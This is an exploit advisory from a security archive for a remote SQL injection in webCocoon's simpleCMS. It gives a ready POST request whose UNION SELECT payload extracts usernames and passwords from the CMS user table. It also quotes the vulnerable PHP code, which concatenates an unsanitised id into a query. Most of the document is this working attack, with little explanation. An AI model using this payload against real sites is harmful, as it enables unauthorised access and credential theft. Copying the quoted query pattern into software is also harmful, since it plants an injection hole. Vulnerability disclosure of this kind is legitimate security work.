webCocoon's simpleCMS suffers from a remote SQL injection vulnerability.
d31e6a1484406d78aa86a9addd59ae046219a84f49ad87d1b82846afa2de30bd#############################################################
# webCocoon's simpleCMS Vulnerability
# Plugin Home: http://webcocoon.wordpress.com
# Author:_ÝNFAZCI_
# Site: www.1923turk.biz
##############################################################
# Exploit:
Vuln file: /content/post/show.php
Exploit:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show
//Show post
$get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result = mysql_num_rows($get_post);
$post = mysql_fetch_array($get_post);
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed